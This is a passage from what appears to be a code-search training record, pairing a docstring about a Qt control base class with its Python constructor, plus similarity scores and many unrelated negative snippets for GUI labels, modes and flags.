self.curbuf]", "def mode(self) -> str:\r\n ...", "def geef_kolom_keuzes(self):\n return self._kolom_codelijst.geef_terminals()", "def getMode(self):\n return self._mode", "def _get_app_flags_mode(self, string):\n\n app = ''\n flags = ''\n mode = 0\n split = string.split()\n\n if len(split) == 0:\n pass\n\n elif len(split) == 1:\n part = split[0]\n if self._is_app(part):\n app = part\n elif self._is_flags(part):\n flags = part\n elif self._is_mode(part):\n mode = part\n\n elif len(split) == 2:\n part0 = split[0]\n part1 = split[1]\n\n if self._is_app(part0):\n app = part0\n if self._is_flags(part1):\n flags = part1\n elif self._is_mode(part1):\n mode = part1\n elif self._is_flags(part0):\n flags = part0\n if self._is_mode(part1):\n mode = part1\n elif self._is_mode(part0):\n mode = part0\n if self._is_flags(part1):\n flags = part1\n\n elif len(split) >= 3:\n part0 = split[0]\n part1 = split[1]\n part2 = split[2]\n\n if self._is_app(part0):\n app = part0\n if self._is_flags(part1):\n flags = part1\n if self._is_mode(part2):\n mode = part2\n elif self._is_mode(part1):\n mode = part1\n if self._is_flags(part2):\n flags = part2\n elif self._is_flags(part0):\n flags = part0\n if self._is_mode(part1):\n mode = part1\n elif self._is_mode(part0):\n mode = part0\n if self._is_flags(part1):\n flags = part1\n #Always run in new window\n flags = 'f'\n return app, flags, int(mode)", "def getting_flags_locations(self):\n print(self.flags)\n self.line_finder.find_line(self.html)", "def read_all_status_characters(self):\n return self.STATUS_CHARACTERS", "def get_modes_of_operation(self):\n return [\"Online\", \"Offline\"]", "def getZaptelConf(self):\n output = []\n for portInd, portLine in enumerate(self.portLines):\n if self[portInd]['type'] != 'na':\n values = self[portInd]\n values['type'] = values['type'] == 'fxs' and \"fxo\" or 'fxs' #Hmm crazy zaptel idea that your fxo is your fxs in zapata but the correct way around in zaptel\n output.append(\"%(type)s%(signalling)s=\" % self[portInd] + str(portLine[0]))\n return output", "def getVKBEditMode(self):\r\n return eval(self.phone.sx('(send (get-text-editor-manager) get-edit-mode)', convertToString=True).title())", "def mapping_description(self):\n\n mapping_description_lines = []\n\n if self.valuemap:\n for value in sorted(self.valuemap.keys()):\n mapping = self.valuemap[value]\n mapping_description_lines.append(\"'{}' <-> '{}'\\n\".format(value, mapping))\n return mapping_description_lines", "def GetEOLChar(self):\n m_id = self.GetEOLMode()\n if m_id == wx.stc.STC_EOL_CR:\n return u'\\r'\n elif m_id == wx.stc.STC_EOL_CRLF:\n return u'\\r\\n'\n else:\n return u'\\n'", "def getCharMapping(tweets):\n text = map(lambda x: x.getText(), tweets)\n allChars = [c for s in text for c in s]\n x = collections.Counter(allChars)\n chars_used = x.most_common()[:max_chars]\n charset = map(lambda x: x[0], chars_used)\n # Add padding, start, end and unknown characters\n mapping = dict((c, i) for i, c in enumerate(charset + ['<s>', '</s>', '<pad>', '<unknown>', '<unknown_test>']))\n dump(mapping, open(char_mapping_filename, 'wb'))\n return mapping", "def exit_config_mode(self):\n return \"\"", "def get_lines():\n buf = vim.current.buffer\n return buf", "def _get_lsp_config_path_select_mode_configured(self):\n return self.__lsp_config_path_select_mode_configured", "def partial_modes(self, level, node=None):\n if node:\n return self.operator.modes[self._index_list(level, node)]\n\n indeces = [self._index_list(level, i) for i in range(2**level)]\n return 
np.hstack(tuple([self.operator.modes[idx] for idx in indeces]))", "def _generate_character_map(self):\n self._ct = [-1] * 256\n index = 0\n for c_range in self._meta.character_ranges:\n for c_pos in range(c_range['min'], c_range['max'] + 1):\n self._ct[c_pos] = index\n index += 1", "def get_color_mode(self):\n mode=lib.is_SetColorMode(self.hcam,0x8000)\n return self._color_modes_inv.get(mode,mode)", "def formats(self):\n return self._map.keys()", "def ActiveHlt2Lines(self) :\n lines = [\n 'Hlt2B2HH',\n 'Hlt2B2PiPi',\n 'Hlt2B2KPi',\n 'Hlt2B2KK',\n 'Hlt2Lb2PK',\n 'Hlt2Lb2PPi'\n ]\n\n return lines", "def getModes(this):\n\t\tthis.checkInit()\n\t\t\n\t\t# On sauvegarde la config actuelle\n\t\tinit = this.config(get=True)\n\t\t\n\t\t# Ensembles de modes\n\t\tformats = Camera.formats.copy()\n\t\tmodes = set()\n\t\t\n\t\t# On averti du départ\n\t\tprint '\\nLooping modes for the camera... (%d modes)' % (len(formats))\n\t\t\t\n\t\t# Pour chaques formats\n\t\twhile formats:\n\t\t\t\n\t\t\t# On récupère le format à tester\n\t\t\tformat = formats.pop()\n\t\t\t\n\t\t\t# Configuration actuelle\n\t\t\tmode = this.config(\n\t\t\t\theight = float(format[1]),\n\t\t\t\twidth = float(format[0])\n\t\t\t)\n\t\t\t\n\t\t\t# On enregistre le mode\n\t\t\tcurrentFormat = (mode['width'], mode['height'])\n\t\t\tmodes.add(currentFormat)\n\t\t\tif currentFormat in formats:\n\t\t\t\tformats.remove(currentFormat)\n\t\t\t\n\t\t\t# On affiche l'itération courante\n\t\t\tprintf('%d%5s\\r' % (len(formats), ''))\n\t\t###\n\t\t\n\t\t# On remet comme avant et on retourne la liste de modes\n\t\tthis.config(params=init); print 'Done, found %d.' % (len(modes))\n\t\treturn [(int(mode[0]), int(mode[1])) for mode in modes]", "def build_exception_map(cls, tokens):\r\n exception_ranges = defaultdict(list)\r\n for token in tokens:\r\n token_type, _, token_start, token_end = token[0:4]\r\n if token_type in (tokenize.COMMENT, tokenize.STRING):\r\n if token_start[0] == token_end[0]:\r\n exception_ranges[token_start[0]].append((token_start[1], token_end[1]))\r\n else:\r\n exception_ranges[token_start[0]].append((token_start[1], sys.maxint))\r\n for line in range(token_start[0] + 1, token_end[0]):\r\n exception_ranges[line].append((0, sys.maxint))\r\n exception_ranges[token_end[0]].append((0, token_end[1]))\r\n return exception_ranges", "def preset_modes(self) -> list[str]:\n # Use the Vallox profile names for the preset names.\n return list(STR_TO_VALLOX_PROFILE_SETTABLE.keys())", "def parse_layout(keymap_c: str):\n lines = get_keymap(keymap_c)\n lines = remove_excess_white_space(lines)\n layout_strs = get_layouts_strs(lines)\n return get_layout_keys(layout_strs)", "def _get_modes(self, L=0):\n l = np.arange(L + 1).reshape((-1, 1))\n z = np.zeros((L + 1, 2))\n return np.hstack([l, z])", "def get_mode(self):\n self.read(\":FUNC?\")", "def get_config_lines(self, key):\n return \" \".join([key, self._config[key][\"value\"], \"#\", self._config[key][\"comments\"]] if self._config[key][\"comments\"] is not None\n else [key, self._config[key][\"value\"]])", "def init_modes(self):\n \n self.deleteMode = delete_Mode()\n self.commandMode = command_Mode()\n self.visualMode = visual_Mode()\n self.insertMode = insert_Mode()\n self.exMode = ex_Mode()\n self.yankMode = yank_Mode()\n self.gmodeMode = gmode_Mode()\n self.cmodeMode = cmode_Mode()\n self.rmodeMode = rmode_Mode()\n self.tmodeMode = tmode_Mode()\n self.selectionMode = selection_Mode()\n self.indentMode = indent_Mode()", "def modes(self, avg=False):\n if not self.fp_init:\n 
self._init_full_props\n if avg:\n return self._modes_avg, self._num_modes\n return self._modes, self._num_modes", "def get_opcode_mode(op):\n op_str = f\"{op:05}\"\n DE = int(op_str[-2:])\n C = int(op_str[2])\n B = int(op_str[1]) \n A = int(op_str[0]) \n\n return A, B, C, DE", "def currentMode(self):\n logger.debug(\"Func: currentMode/getter\")\n\n return self._currentsDict[\"currentMode\"]", "def separate_mode_type(mode):\n m = stat.S_IMODE(mode)\n t = stat.S_IFMT(mode)\n return m, mode_to_unix(t)", "def ActiveHlt2Lines(self) :\n\n lines = [\n 'Hlt2SingleMuon',\n 'Hlt2SingleMuonHighPT',\n 'Hlt2SingleMuonLowPT',\n ]\n \n return lines", "def extra_state_attributes(self) -> dict[str, str]:\n if self._cmode is None:\n return {}\n return {ATTR_CMODE: self._cmode}", "def _get_lsp_config_path_select_mode_unconditional(self):\n return self.__lsp_config_path_select_mode_unconditional", "def get_map(self):\n return self.get_raw_ys()", "def branches(self):\n return self.in_lines + self.out_lines" ]
[ "0.63044417", "0.6147848", "0.5959693", "0.5748074", "0.57146144", "0.5593236", "0.54169565", "0.54102844", "0.53679585", "0.5359293", "0.5346539", "0.5331634", "0.53012353", "0.5280056", "0.52593654", "0.52485204", "0.51640564", "0.5128611", "0.51207393", "0.51181734", "0.5070815", "0.50445783", "0.50445783", "0.5026303", "0.5024813", "0.5011286", "0.4998007", "0.4982108", "0.49743688", "0.49624553", "0.4946604", "0.49225214", "0.49156147", "0.49013764", "0.48998696", "0.48776537", "0.4872287", "0.48685196", "0.48679757", "0.48463494", "0.4843349", "0.48277453", "0.48260796", "0.4804955", "0.48033822", "0.48012325", "0.4771022", "0.47652483", "0.47610146", "0.4739435", "0.47350392", "0.47309792", "0.47213328", "0.47153068", "0.47123528", "0.47106335", "0.47102326", "0.4706636", "0.47035414", "0.47001228", "0.46847597", "0.46842253", "0.46753025", "0.46725753", "0.46582302", "0.46556345", "0.46523872", "0.46483147", "0.4645053", "0.46333164", "0.4632547", "0.4622022", "0.46153834", "0.45971", "0.45969278", "0.4593864", "0.45911032", "0.45879862", "0.45861897", "0.45856938", "0.4584695", "0.45794022", "0.45739627", "0.45658514", "0.45586914", "0.4558479", "0.45564532", "0.4555265", "0.45515016", "0.4550603", "0.4547667", "0.45463377", "0.45452863", "0.4544144", "0.4543211", "0.45391715", "0.4531764", "0.45269614", "0.4526361", "0.45251802" ]
0.808408
0
Base Class for all controls. On its own, this is just a Label in a BoxLayout.
def __init__(self, label:str=None, variable_name:str=None, value:typing.Any=None, parent:QtWidgets.QWidget=None, on_change:typing.Callable=None): QtWidgets.QWidget.__init__(self, parent=parent) if label is None: if variable_name is None: label = "" else: label = app.translator(variable_name) self._make_label_widget(label) self.layout = self._formset() self.setLayout(self.layout) self.label = label ValueMixin.__init__(self, variable_name=variable_name, on_change=on_change, value=value)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def create_label(self):\n\n self.pc_label = Label(self.form_box, text=\"Primary Current [A]:\", anchor='nw', width=32,\n bg=self.design.color.secondary, font=('Arial', 15))\n self.sc_label = Label(self.form_box, text=\"Secondary Current [A]:\", anchor='nw', width=32,\n bg=self.design.color.secondary, font=('Arial', 15))\n self.avg_t_label = Label(self.form_box, text=\"Average Time [s]: \", anchor='nw', width=32,\n bg=self.design.color.secondary, font=('Arial', 15))\n self.nwt_label = Label(self.form_box, text=\"network type (static/dynamic):\", anchor='nw', width=32,\n bg=self.design.color.secondary, font=('Arial', 15))\n self.nw_ip_label = Label(self.form_box, text=\"IpAddress:\", anchor='nw', width=32,\n bg=self.design.color.secondary, font=('Arial', 15))\n self.nw_gw_label = Label(self.form_box, text=\"Gateway:\", anchor='nw', width=32, bg=self.design.color.secondary,\n font=('Arial', 15))\n self.nw_sm_label = Label(self.form_box, text=\"subnet mask:\", anchor='nw', width=32,\n bg=self.design.color.secondary, font=('Arial', 15))\n self.nw_mca_label = Label(self.form_box, text=\"Mac Address:\", anchor='nw', width=32,\n bg=self.design.color.secondary, font=('Arial', 15))", "def create_widget(self):\n self.widget = UILabel()", "def GridLabel(Parent,Text,Row,Column):\r\n L = Label(Parent,text=Text)\r\n L.grid(row=Row,column=Column)\r\n return L", "def BaseLabel(self, *args):\n return _XCAFDoc.XCAFDoc_ShapeTool_BaseLabel(self, *args)", "def add_label(self, side=\"left\", **kwargs):\n widget = ttk.Label(self, **kwargs)\n widget.pack(side=side)\n\n return widget", "def label(self, color):\r\n return Label(self, color)", "def __init__(self, parent, text):\n tk.Frame.__init__(self, parent)\n\n label = tk.Label(self, text=\"De Centrale\", font=(\"Verdana\", 25))\n label.pack(fill=tk.BOTH, side='left', anchor='w')\n\n label = tk.Label(self, text=text, anchor=\"e\", font=(\"Verdana\", 12))\n label.pack(expand=True, fill=tk.BOTH, side='right', anchor='e')", "def create_label(self, on, text: str):\n return tk.Label(on, font=self.FONT, bg=self.BG_COLOR, text=text)", "def __init__(self, parent, text_link=None):\n Frame.__init__(self, parent)\n if text_link is None:\n text_link = StringVar(value=\"Running\")\n self._text = text_link\n self._label = Label(self, bd=1, relief=SUNKEN, anchor=W, textvariable=self._text)\n self._label.pack(fill=X)", "def __init__(self, label=None):\n super().__init__(\"h\", 1, [], label=label)", "def customWidgets(self):\n \n # to be called a property value needs to change\n def onValueChanged(widget, prop):\n # set the corresponding property of the videobalance element\n self.balance.set_property(prop, widget.get_value())\n\n # videobalance has several properties, with the following range\n # and defaults\n properties = [(\"contrast\", 0, 2, 1),\n (\"brightness\", -1, 1, 0), \n (\"hue\", -1, 1, 0),\n (\"saturation\", 0, 2, 1)]\n \n # create a place to hold our controls\n controls = gtk.VBox()\n labels = gtk.VBox()\n # for every propety, create a control and set its attributes\n for prop, lower, upper, default in properties:\n widget = gtk.HScale(); label = gtk.Label(prop)\n\n # set appropriate atributes\n widget.set_update_policy(gtk.UPDATE_CONTINUOUS)\n widget.set_value(default)\n widget.set_draw_value(True)\n widget.set_range(lower, upper)\n\n # connect to our signal handler, specifying the property\n # to adjust\n widget.connect(\"value-changed\", onValueChanged, prop)\n \n # pack widget into box\n controls.pack_start(widget, True, True)\n labels.pack_start(label, 
True, False)\n\n layout = gtk.HBox()\n layout.pack_start(labels, False, False)\n layout.pack_end(controls, True, True)\n return layout", "def BaseLabel(self, *args):\n return _XCAFDoc.XCAFDoc_ColorTool_BaseLabel(self, *args)", "def __init__(self,name,value,*args,**kargs):\n self._plain = kargs.get('plain',False)\n self.input = QtGui.QLabel()\n maxw,maxh = maxSize()\n self.input.setMaximumSize(int(0.75*maxw),maxh)\n InputItem.__init__(self,name,*args,**kargs)\n self.setValue(value)\n self.layout().insertWidget(1,self.input)\n self.label.setWordWrap(True)\n self.setSize()", "def __init__(self, text=\"\", widget=None):\n self._label_text = text\n self._widget = widget\n self._widget.on_change = self._update\n super().__init__(text=f\"{text} {widget.value}\")", "def BaseLabel(self, *args):\n return _XCAFDoc.XCAFDoc_LayerTool_BaseLabel(self, *args)", "def __init__(self, font, color, text=\"\", top=0, left=0, bottom=None, right=None):\n self.text = text\n self.font = font\n self.color = color\n self.top = top\n self.left = left\n self.bottom = bottom\n self.right = right\n self.renderLabel()", "def Label(self) -> str:", "def DrawControlLabel(self, dc, wnd, item, rect):\r\n\r\n label_size = GetLabelSize(dc, item.GetLabel(), item.GetOrientation() != AUI_TBTOOL_HORIZONTAL)\r\n text_height = label_size.GetHeight()\r\n text_width = label_size.GetWidth()\r\n\r\n dc.SetFont(self._font)\r\n\r\n if self._agwFlags & AUI_TB_TEXT:\r\n \r\n tx, text_height = dc.GetTextExtent(\"ABCDHgj\") \r\n\r\n text_width, ty = dc.GetTextExtent(item.GetLabel())\r\n\r\n # don't draw the label if it is wider than the item width\r\n if text_width > rect.width:\r\n return\r\n\r\n # set the label's text colour\r\n dc.SetTextForeground(wx.BLACK)\r\n\r\n text_x = rect.x + (rect.width/2) - (text_width/2) + 1\r\n text_y = rect.y + rect.height - text_height - 1\r\n\r\n if self._agwFlags & AUI_TB_TEXT and item.GetLabel() != \"\": \r\n dc.DrawText(item.GetLabel(), text_x, text_y)", "def label_grid(self):\n\n self.pc_label.grid(row=0, sticky=\"nw\", pady=2, padx=3)\n self.sc_label.grid(row=1, sticky=\"nw\", pady=2, padx=3)\n self.avg_t_label.grid(row=2, sticky=\"nw\", pady=2, padx=3)\n self.nwt_label.grid(row=4, sticky=\"nw\", pady=2, padx=3)\n self.nw_ip_label.grid(row=5, sticky=\"nw\", pady=2, padx=3)\n self.nw_gw_label.grid(row=6, sticky=\"nw\", pady=2, padx=3)\n self.nw_sm_label.grid(row=7, sticky=\"nw\", pady=2, padx=3)\n self.nw_mca_label.grid(row=8, sticky=\"nw\", pady=2, padx=3)", "def BaseLabel(self, *args):\n return _XCAFDoc.XCAFDoc_MaterialTool_BaseLabel(self, *args)", "def createLabel(self, text, font):\n label = QLabel(self)\n label.setFont(font)\n label.setText(text)\n label.setFixedHeight(40)\n label.setAlignment(Qt.AlignCenter)\n label.setStyleSheet('background-color: rgba(0,0,0,0);color: white; border: 0px solid black; ')\n return label", "def __init__(self, parent) -> None:\n super().__init__(parent)\n\n self.setText(\"\")\n self.setPixmap(QPixmap(self.image))\n\n self.setScaledContents(False)\n self.setObjectName(\"Label_Bild\")\n self.setAlignment(QtCore.Qt.AlignCenter)", "def __init__(self, label):\n self.label = label", "def __init__(self,\n rect: Rect,\n text: str = \"\",\n style: Style = None,\n parent: Component = None) -> None:\n Component.__init__(self, rect, style=style, parent=parent)\n self.set_text(text)", "def __init__(self, parent, *args, **kwargs):\n tk.LabelFrame.__init__(self, parent, *args, **kwargs)\n self.canvas = MainCanvas(self, bg=\"orange\")\n self.canvas.pack(side='top', fill='both', 
expand=True)", "def create_widgets(self):\n #create description label\n Label(self,\n text = \"Patient Info:\"\n ).grid(row = 0, column = 0, sticky = W)", "def __init__(self, x, y, align_bottom_left, text, font, color):\n super(TextBox, self).__init__(x, y)\n\n self.align_bottom_left = align_bottom_left\n self.__text = text\n self.font = font\n self.color = color\n self.original_x = x\n self.original_y = y\n self.image = None\n self.image_rect = None\n\n self.set_text(text)", "def myEntLabel(name='myText', \r\n\t\t\t numb=None,\r\n\t\t\t call=None, data=['dati'],\r\n\t\t\t nLab='Label', cLab=\"#333\",\r\n\t\t\t tLab='h', aLab=[False, False, 1]):\r\n#myEntry\r\n\t# entr, call\r\n\tentr,call = myEntry(name=name,\r\n\t\t\t \t\t\tnumb=numb, \r\n\t\t\t \t\t\tcall=call, data=data)\r\n#myLabel\r\n\tif cLab == None:\r\n\t\tcLab=Gdk.color_parse('blue')\r\n\t# labe\r\n\tlabe = myLabel(name=nLab, \r\n\t\t\t\t\tleng=len(nLab)+1, prea=' ', post=' ', \r\n\t\t\t\t\tfont='Courier 10', \r\n\t\t\t\t\tcolo=cLab)\r\n#xBox \r\n\txBox = myBox(tLab)\r\n\t#child, expand=True, fill=True, padding=0\r\n\txBox.pack_start(labe, *aLab)\r\n\txBox.pack_start(entr, *aLab)\t\r\n# <- \r\n\treturn xBox, [entr, call, labe]", "def __init__(self, text='', **kwargs):\n Control.__init__(self, text=text, **kwargs)", "def create_controls(self):\n\n self.button_frame = tk.LabelFrame(self, text=\"Controls\", padx=5, pady=5)\n self.button_frame.grid(row=0, column=1, padx=5, pady=5, sticky=\"n\")\n self.load_data = tk.Button(\n self.button_frame, text=\"Load Data\", command=self.update_stats\n )\n self.load_data.grid(row=0)\n\n self.print_data = tk.Button(\n self.button_frame, text=\"Print Data\", command=self.print_raw_data,\n )\n self.print_data.grid(row=1)\n\n self.quit = tk.Button(\n self.button_frame, text=\"Quit\", fg=\"red\", command=self.master.destroy\n )\n self.quit.grid(row=2)", "def create_ui(self):\n main_sizer = wx.BoxSizer(wx.VERTICAL)\n\n self.text_ctrl = wx.TextCtrl(self, style=wx.TE_MULTILINE)\n self.text_ctrl.Bind(wx.EVT_TEXT, self.on_text)\n main_sizer.Add(self.text_ctrl, 1, wx.ALL | wx.EXPAND, 5)\n\n self.SetSizer(main_sizer)", "def BaseLabel(self, *args):\n return _XCAFDoc.XCAFDoc_DimTolTool_BaseLabel(self, *args)", "def __init__( self ):\n \n Frame.__init__( self ) # initializes Frame instance\n \n # frame fills all available space\n self.pack( expand = YES, fill = BOTH )\n self.master.title( \"Labels\" )\n \n self.Label1 = Label( self, text = \"Label with text\" )\n \n # resize frame to accommodate Label\n self.Label1.pack()\n \n self.Label2 = Label( self,\n text = \"Labels with text and a bitmap\" )\n \n # insert Label against left side of frame\n self.Label2.pack( side = LEFT )\n \n # using default bitmap image as label\n self.Label3 = Label( self, bitmap = \"warning\" )\n self.Label3.pack( side = LEFT )", "def __init__(self, dat, frame, box_size, centre,\n label=False, **kwargs):\n\n super().__init__(dat, frame, box_size, centre) # initialise superclass\n\n self.label = label # write labels\n\n self.draw()", "def __init__(self, name, label, class_to_use, size, state, left_window_label=None, left_window_value=None):\n self.name = name\n self.label = label\n self.class_to_use = class_to_use\n self.size = size\n self.state = state\n self.left_window_label = left_window_label\n self.left_window_value = left_window_value", "def __init__(self, ax, labels, bw=None, bh=None, colors=None, actives=None):\n AxesWidget.__init__(self, ax)\n\n labels = copy.deepcopy(labels)\n\n labels.append(\"select all\")\n 
labels.append(\"unselect all\")\n print(\"colors\", colors)\n colors = colors+[\"#000000\"]*2\n\n ax.set_xticks([])\n ax.set_yticks([])\n ax.set_navigate(False)\n\n if actives is None:\n actives = [False] * len(labels)\n actives = actives+[False]*2\n\n if len(labels) > 1:\n dy = 1. / (len(labels) + 1)\n ys = np.linspace(1 - dy, dy, len(labels))\n else:\n dy = 0.25\n ys = [0.5]\n\n axcolor = ax.get_facecolor()\n\n self.labels = []\n self.lines = []\n self.rectangles = []\n\n lineparams = {'color': 'k', 'linewidth': 1.2,\n 'transform': ax.transAxes, 'solid_capstyle': 'butt'}\n\n for index, (y, label, active) in enumerate(zip(ys, labels, actives)):\n if colors is None:\n t = ax.text(0.25, y, label, transform=ax.transAxes,\n horizontalalignment='left',\n verticalalignment='center')\n else:\n t = ax.text(0.25, y, label, transform=ax.transAxes,\n horizontalalignment='left',\n verticalalignment='center', color=colors[index])\n\n if bw is None:\n w = dy / 2\n else:\n w = bw\n\n if bh is None:\n h = dy / 2\n else:\n h = bh\n\n x, y = 0.05, y - h / 2\n\n p = Rectangle(xy=(x, y), width=w, height=h, edgecolor='black',\n facecolor=axcolor, transform=ax.transAxes)\n\n l1 = Line2D([x, x + w], [y + h, y], **lineparams)\n l2 = Line2D([x, x + w], [y, y + h], **lineparams)\n\n l1.set_visible(active)\n l2.set_visible(active)\n self.labels.append(t)\n self.rectangles.append(p)\n self.lines.append((l1, l2))\n ax.add_patch(p)\n ax.add_line(l1)\n ax.add_line(l2)\n\n self.connect_event('button_press_event', self._clicked)\n\n self.cnt = 0\n self.observers = {}", "def label(self):\r\n raise NotImplementedError", "def __display_controls(self):\n self.__fill_data_variables()\n self.__fill_smoothing_method()\n self.__fill_smooth_factor()\n\n left_box = VBox([self.data_vars])\n center_box = VBox([self.smoothing_methods])\n right_box = VBox([self.smooth_factor])\n #_HBox = HBox([left_box, center_box, right_box],\n _HBox = HBox([left_box, center_box, right_box],\n layout={'height': '80px',\n 'width' : '99%'}\n )\n display(_HBox)", "def add_variable(self, side=\"left\", **kwargs):\n widget = ttk.Label(self, **kwargs)\n widget.pack(side=side)\n\n return widget", "def __init__(self):\n\t\tself.root = Tk()\n\t\tself.root.geometry(\"1600x1600\")\n\t\ttitle_arabic=u'\\uFEB3\\uFEE8\\uFECC\\uFEEE\\uFEA9'\n\t\tself.root.title(title_arabic)\n\t\tself.root.geometry(\"1600x900\")\t\t\n\t\tself.root.resizable(width=False, height=False)\n\t\tmylabel=Label(text=\"Loading . . 
.\",fg=\"#ff1a75\",bg=\"black\",font=(\"Times New Roman\",18))\n\t\tmylabel.place(x=665,y=300)\n\t\tmylabel3=Text()\n\t\tmylabel3.place(x=550,y=395)\n\t\tmylabel3['width']='50'\n\t\tmylabel3['height']=0.6\n\t\tmylabel3.configure(state='disabled')\n\t\tself.root.configure(background='black')\n\t\tself.load()\n\t\tself.root.mainloop()", "def init ( self, parent ):\n # Create a panel to hold all of the buttons:\n self.control = panel = wx.Panel( parent, -1 )\n sizer = wx.BoxSizer( wx.VERTICAL )\n \n # Add the standard font control:\n font = self._font = wx.TextCtrl( panel, -1, self.str_value )\n wx.EVT_KILL_FOCUS( font, self.update_object )\n wx.EVT_TEXT_ENTER( panel, font.GetId(), self.update_object )\n sizer.Add( font, 0, wx.EXPAND | wx.BOTTOM, 3 )\n \n # Add all of the font choice controls:\n sizer2 = wx.BoxSizer( wx.HORIZONTAL )\n facenames = all_facenames()\n control = self._facename = wx.Choice( panel, -1, wx.Point( 0, 0 ), \n wx.Size( choice_width( facenames ), 20 ), \n facenames )\n \n sizer2.Add( control, 2, wx.EXPAND )\n wx.EVT_CHOICE( panel, control.GetId(), self.update_object_parts )\n \n control = self._point_size = wx.Choice( panel, -1, \n wx.Point( 0, 0 ), wx.Size( 30, 20 ), \n PointSizes )\n sizer2.Add( control, 1, wx.EXPAND | wx.RIGHT, 3 )\n wx.EVT_CHOICE( panel, control.GetId(), self.update_object_parts ) \n \n sizer.Add( sizer2, 0, wx.EXPAND )\n \n # Set-up the layout:\n panel.SetAutoLayout( True )\n panel.SetSizer( sizer )\n sizer.Fit( panel )", "def create_widget(self):\n pass", "def create_labels(self):\n for name in self.names:\n temp_button = Label(text=name)\n self.root.ids.label_box.add_widget(temp_button)", "def initWidgets(self):\n self.loctext.setText(\"{0:g}\".format(self.loc))\n self.scaletext.setText(\"{0:g}\".format(self.scale))", "def __init__(self, title=None, dimensions=None, style=None, spacing=None, margin=None, layout=None):\n super(customGroupBox, self).__init__()\n\n if layout:\n self.setLayout(layout)\n else:\n self.setLayout(QtGui.QVBoxLayout())\n\n if title:\n self.setTitle(title)\n\n if dimensions:\n self.setFixedSize(dimensions[0], dimensions[1])\n\n if style:\n self.setStyle(QtGui.QStyleFactory.create(style))\n\n if margin:\n self.layout().setContentsMargins(margin, margin, margin, margin)\n\n if spacing:\n self.layout().setSpacing(spacing)", "def __init__(self, parent=None):\n QLabel.__init__(self, parent)\n self.start_animation(self.SLOW_DURATION)", "def text(self) -> None:\n label_space = tk.Label(self)\n label_space.grid(row=0)\n label_book_number = tk.Label(self, text=f'Номер книги:')\n label_book_number.grid(row=1, column=0, ipady=5)\n label_title = tk.Label(self, text='Название книги:')\n label_title.grid(row=2, column=0, padx=5)\n label_author = tk.Label(self, text='Автор:')\n label_author.grid(row=3, column=0, pady=5)\n label_genre = tk.Label(self, text='Жанр:')\n label_genre.grid(row=4, column=0)", "def toControls(self,widget):", "def renderLabel(self):\n self.render = self.font.render(self.text, True, self.color)\n self.rect = self.render.get_rect()", "def _initLayout(self):\n\t\tpanel = wx.Panel(self)\n\n\t\t# Create a font object\n\t\tfont = wx.SystemSettings.GetFont(wx.SYS_SYSTEM_FONT)\n\t\tfont.SetPointSize(9)\n\n\t\t# Vertical sizer will contain multiple horizontal sizers as rows\n\t\tvbox = wx.BoxSizer(wx.VERTICAL)\n\n\t\t# First Row: The text we need to categorize\n\t\thbox1 = wx.BoxSizer(wx.HORIZONTAL)\n\t\tst1 = wx.StaticText(panel, label='Text')\n\t\tst1.SetFont(font)\n\t\thbox1.Add(st1, flag=wx.RIGHT, border=8)\n\t\ttc = 
wx.TextCtrl(panel)\n\t\tself._textControl = tc\n\t\thbox1.Add(tc, proportion=1)\n\t\tvbox.Add(hbox1, flag=wx.EXPAND|wx.LEFT|wx.RIGHT|wx.TOP, border=10)\n\t\t\n\t\t# The existing class assignment\n\t\thboxExisting = wx.BoxSizer(wx.HORIZONTAL)\n\t\tlabel = wx.StaticText(panel, label='Current')\n\t\tlabel.SetFont(font)\n\t\thboxExisting.Add(label, flag=wx.RIGHT, border=8)\n\t\t\n\t\tlabel = wx.StaticText(panel, label=\"(unassigned)\")\n\t\tself._existingClass = \"(unassigned)\"\n\t\tself._existingClassLabel = label\n\t\tlabel.SetFont(font)\n\t\thboxExisting.Add(label, flag=wx.RIGHT, border=8)\n\t\tvbox.Add(hboxExisting, flag=wx.EXPAND|wx.LEFT|wx.RIGHT|wx.TOP, border=10)\n\t\t\n\t\t# Button to keep the current class assignment\n\t\tbutton = wx.Button(panel, label=\"KEEP\", name=\"*KEEP\")\n\t\thboxExisting.Add(button, flag=wx.RIGHT)\n\n\t\t# Button to skip this record, i.e., move to next record without writing this one out\n\t\tbutton = wx.Button(panel, label=\"DELETE\", name=\"*KILL\")\n\t\thboxExisting.Add(button, flag=wx.RIGHT)\n\n\t\tvbox.Add((-1, 10))\n\n\t\t# Buttons for classes that can be assigned to the text\n\t\thbox2 = wx.BoxSizer(wx.HORIZONTAL)\n\t\tst2 = wx.StaticText(panel, label='Reassign to...')\n\t\tst2.SetFont(font)\n\t\thbox2.Add(st2)\n\t\tvbox.Add(hbox2, flag=wx.LEFT | wx.TOP, border=10)\n\n\t\tvbox.Add((-1, 10))\n\n\t\t# Grid of buttons, one for each class label\n\t\thbox3 = wx.GridSizer(8,5,50)\n\t\n\t\tfor label in sorted(labels.LABELS):\n\t\t\tbutton = MyButton(panel, label=label, size=(70, 30), name=label)\n\t\t\thbox3.Add(button)\n\n\t\tvbox.Add(hbox3, flag=wx.LEFT|wx.RIGHT|wx.EXPAND, \n\t\t\tborder=10)\n\t\t\n\t\tpanel.SetSizer(vbox)", "def __init__(self):\n super(GraphVisualizerCase, self).__init__()\n\n self._v_layout = QVBoxLayout()\n self.setLayout(self._v_layout)\n\n top_label_layout = QHBoxLayout()\n self._v_layout.addLayout(top_label_layout)\n\n self._top_left_label = MathTextLabel()\n top_label_layout.addWidget(self._top_left_label)\n self._top_right_label = MathTextLabel()\n top_label_layout.addWidget(self._top_right_label)\n\n self._center_widget = QFrame()\n self._center_text_label = QLabel()\n self._center_text_label.setAlignment(Qt.AlignCenter)\n layout = QHBoxLayout()\n layout.addWidget(self._center_text_label)\n self._center_widget.setLayout(layout)\n\n self._v_layout.addWidget(self._center_widget)\n\n bot_label_layout = QHBoxLayout()\n self._v_layout.addLayout(bot_label_layout)\n\n self._bot_left_label = MathTextLabel()\n bot_label_layout.addWidget(self._bot_left_label)\n self._bot_right_label = MathTextLabel()\n bot_label_layout.addWidget(self._bot_right_label)", "def _create_label(self, x, y, text, width=50, **config):\n\n self.main_canvas.create_text(x, y, text='%6s' % text, width=width, **config)", "def _setup_ui(self):\n from functools import partial\n\n self.setStyleSheet(\n \"\"\"\n QLabel[labelField=\"true\"] {\n font-weight: bold;\n }\n \"\"\"\n )\n\n # The main layout\n self.main_layout = QtWidgets.QVBoxLayout(self)\n self.main_layout.setContentsMargins(0, 0, 0, 0)\n\n # the form layout\n self.form_layout = QtWidgets.QFormLayout()\n 